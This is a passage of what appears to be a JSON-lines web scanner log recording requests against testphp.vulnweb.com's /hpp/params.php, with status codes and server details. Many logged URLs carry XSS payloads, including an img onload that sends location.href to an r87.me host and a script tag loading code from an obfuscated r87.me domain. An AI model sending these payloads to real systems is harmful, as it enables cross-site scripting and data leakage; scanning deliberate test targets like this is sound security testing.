ntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":17,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:31.183695545Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Enetsparker(0x005036\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CscRipt%3Enetsparker(0x005036\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Enetsparker(0x005036\",\"time\":\"344.81805ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":32,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:31.468518037Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Enetsparker(0x005036)%3C%2fscRipt%3E\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CscRipt%3Enetsparker(0x005036)%3C%2fscRipt%3E\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Enetsparker(0x005036)%3C%2fscRipt%3E\",\"time\":\"354.609757ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":42,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:31.768184642Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Enetsparker(0x107FBD\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=\\u0026p=valid\\u0026pp=%3CscRipt%3Enetsparker(0x107FBD\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f\\u0026p=valid\\u0026pp=%3CscRipt%3Enetsparker(0x107FBD\",\"time\":\"352.422744ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":32,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:32.528800425Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3\\u0026p\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3\\u0026p\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f=3\\u0026p\",\"time\":\"351.830341ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:32.529887564Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3\\u0026p=%3CiMg%20src%3d%22%252\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3\\u0026p=%3CiMg%20src%3d%22%252\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f=3\\u0026p=%3CiMg%20src%3d%22%252\",\"time\":\"342.184006ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":12,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:32.623904637Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3\\u0026p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvffdujmqnumt1bjkxifmvoyfr6vtb3zin'%2b'jak.r87.me%2fr%2f%3f'%2blocation.href%22%3E\\u0026pp=12\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3\\u0026p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvffdujmqnumt1bjkxifmvoyfr6vtb3zin'%2b'jak.r87.me%2fr%2f%3f'%2blocation.href%22%3E\\u0026pp=12\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f=3\\u0026p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvffdujmqnumt1bjkxifmvoyfr6vtb3zin'%2b'jak.r87.me%2fr%2f%3f'%2blocation.href%22%3E\\u0026pp=12\",\"time\":\"352.487229ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":1,\"status_code\":200,\"content_length\":144,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:32.63769708Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3\\u0026p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvffdujmqnumt1bjkxifmvoyfr6vtb3zin'%2b'jak.r87.me%2fr%2f%3f'%2blocation.href%22%3E\\u0026pp=12CONFIRMED\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=3\\u0026p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvffdujmqnumt1bjkxifmvoyfr6vtb3zin'%2b'jak.r87.me%2fr%2f%3f'%2blocation.href%22%3E\\u0026pp=12CONFIRMED\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?aaaa%2f=3\\u0026p=%3CiMg%20src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22%20onload%3d%22this.onload%3d''%3bthis.src%3d'%2f%2fmv9e8mbvffdujmqnumt1bjkxifmvoyfr6vtb3zin'%2b'jak.r87.me%2fr%2f%3f'%2blocation.href%22%3E\\u0026pp=12CONFIRMED\",\"time\":\"339.560629ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":1,\"status_code\":200,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:32.682149239Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p\",\"time\":\"361.878162ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:32.90015128Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=%3Cscript\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=%3Cscript\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=%3Cscript\",\"time\":\"355.579181ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":7,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.005452059Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p\\u0026lt;iframe\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=\\u0026lt;iframe\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p\\u0026lt;iframe\",\"time\":\"364.525016ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.063475836Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/script\\u0026gt\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/script\\u0026gt\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/script\\u0026gt\",\"time\":\"343.633843ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.063868137Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/script\\u0026gt;\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/script\\u0026gt;\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p\\u0026lt;script\\u0026gt;alert(1)\\u0026lt;/script\\u0026gt;\",\"time\":\"339.273253ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.125635779Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08\",\"time\":\"346.859027ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":24,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.179175846Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08)%D3%40%1D%A0%A2%05%09%11%89HiP\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08)%D3%40%1D%A0%A2%05%09%11%89HiP\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%10E%DF%AE%8D%BDI%08)%D3%40%1D%A0%A2%05%09%11%89HiP\",\"time\":\"352.366649ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":37,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.322330304Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%251\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%251\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=CWS%07%0E000x%9C=%8D1N%C3%40%251\",\"time\":\"338.480053ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":18,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.409802226Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=%27%22--%3E%3C%2Fst\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=%27%22--%3E%3C%2Fst\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=%27%22--%3E%3C%2Fst\",\"time\":\"339.0317ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":14,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.41711225Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%25\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%25\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%25\",\"time\":\"344.87051ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":28,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.473580876Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt+src%3D%22%2F%2Fmv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja%26%2346%3Br87%26%2346%3Bme%22%3E%3C%2FscRipt%3E\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt+src%3D%22%2F%2Fmv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja%26%2346%3Br87%26%2346%3Bme%22%3E%3C%2FscRipt%3E\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt+src%3D%22%2F%2Fmv9e8mbvffulk1i0duvujvkdkktmkntnztbb8kejrja%26%2346%3Br87%26%2346%3Bme%22%3E%3C%2FscRipt%3E\",\"time\":\"342.875901ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":111,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:33.659352965Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp='\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp='\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp='\",\"time\":\"350.980511ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":6,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:36.923468858Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=12\",\"time\":\"348.332976ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":7,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:37.029867715Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12\\u0026aaaa%2f\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12\\u0026aaaa%2f=\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=12\\u0026aaaa%2f\",\"time\":\"356.611259ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":7,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:37.117485727Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12A01\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12A01\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=12A01\",\"time\":\"356.759354ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":10,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:37.162827265Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12Connection%3A\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12Connection%3A\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=12Connection%3A\",\"time\":\"350.461889ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":18,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:37.523071847Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12Connection:\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12Connection:\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=12Connection:\",\"time\":\"342.701296ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":18,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:37.872763194Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12User-Agent%3A\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12User-Agent%3A\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=12User-Agent%3A\",\"time\":\"357.145506ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":18,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:37.898381269Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12User-Agent:\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12User-Agent:\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=12User-Agent:\",\"time\":\"354.772752ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":18,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:38.138942634Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12has\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=12has\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=12has\",\"time\":\"352.542037ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":10,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:38.665632461Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=aaa\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=aaa\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=aaa\",\"time\":\"348.096158ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":8,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:38.824361635Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=aaa%22bbb\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=aaa%22bbb\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=aaa%22bbb\",\"time\":\"346.511501ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":12,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:40.441891619Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=x\",\"time\":\"343.091514ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":6,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:41.538255819Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseove\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseove\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=x%22+onmouseove\",\"time\":\"352.747541ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":18,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:24:41.810319547Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dalert%280x106ED2\",\"input\":\"http://testphp.vulnweb.com/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dalert%280x106ED2\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/hpp/params.php?p=valid\\u0026pp=x%22+onmouseover%3Dalert%280x106ED2\",\"time\":\"340.113418ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":34,\"failed\":false,\"knowledgebase\":{\"P